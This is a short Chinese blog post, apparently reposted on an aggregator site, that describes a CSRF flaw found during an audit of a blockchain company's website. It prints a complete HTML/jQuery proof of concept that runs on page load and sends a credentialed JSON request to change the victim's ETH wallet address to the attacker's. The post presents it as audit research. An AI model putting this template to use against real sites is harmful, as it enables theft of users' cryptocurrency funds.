某区块链官网存在的CSRF漏洞

其他 2018-09-01 05:11:30 阅读次数: 0

前面帮某区块链公司的官网(市值top100)做安全审计,存在很多问题,其中包括了一个价值的跨站请求伪造CSRF漏洞,可以把打币地址篡改为黑客的钱包地址,从技术来说,有一个比较有价值的点,该网站用ajax提交数据,是application/json格式,很多WEB安全工具都没扫出来(编码格式不对导致错误返回被漏报了),自己写了一个POC完美验证这个问题。下面把POC代码发出来,方面大家研究

<!DOCTYPE html>
<html>
<head>
<script src="jquery.js"></script>
<script>
   var submit = function(){
       jQuery.ajax({

             type: "post",
             url: 'https://xxxxxxxxx/*******/updateETHAddress',
             async: false, 

             xhrFields: {
                 withCredentials: true
             },

             crossDomain: true,
             data: JSON.stringify({                  
                 ethWalletAddress: "bPNin7*****************567Jn******",
             }),
             contentType: "application/json",
             dataType: "json",
             })
         window.location.href='https://xxxxxxxx/index.html';
     };
</script>
</head>
<body onload="submit()">

</body>
</html>

猜你喜欢

转载自blog.csdn.net/softgmx/article/details/81354710
今日推荐
数学建模Matlab之数据预处理方法
充电桩---ISO15118协议详细介绍
对话Kaldi之父、小米首席语音科学家Daniel Povey:开源环境比金钱和荣誉更吸引我 | AGI技术50人...
Hugging Face全攻略:轻松下载Llama 3模型,探索NLP的无限可能!【实操】
阅读送书抽奖?玩转抽奖游戏,js-tool-big-box工具库新上抽奖功能
百度发布Comate代码知识增强2.0,国内首个支持实时检索智能代码助手
黑客利用扫雷游戏 Python 克隆隐藏恶意脚本,攻击欧洲和美国金融机构
微软对开源字体 Cascadia Code 进行重大更新
好书推荐《ChatGPT原理与架构:大模型的预训练、迁移和中间件编程 》
Baidu Comate 智能编码助手:编程新伙伴,效率新飞跃
AI时代:人工智能大模型引领科技创造新时代
百篇博客 · 千里之行
周排行
Python模块之shelve
勇于承担责任
Hikyuu 1.1.0 发布,量化交易研究框架
字节跳动Java3面“凉凉”~不负韶华,努力复习备战“金三银四”
Linux下静态链接库与动态链接库的区别
spring boot架构改造
怎么理解AOP
文件不同步 --本地和eclipse
在linux配置nginx负载均衡
Linux Shell基础命令
每日归档
更多
2024-05-28(2)
2024-05-27(56)
2024-05-26(6)
2024-05-25(68)
2024-05-24(65)
2024-05-23(9)
2024-05-22(41)
2024-05-21(8)
2024-05-20(36)
2024-05-19(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022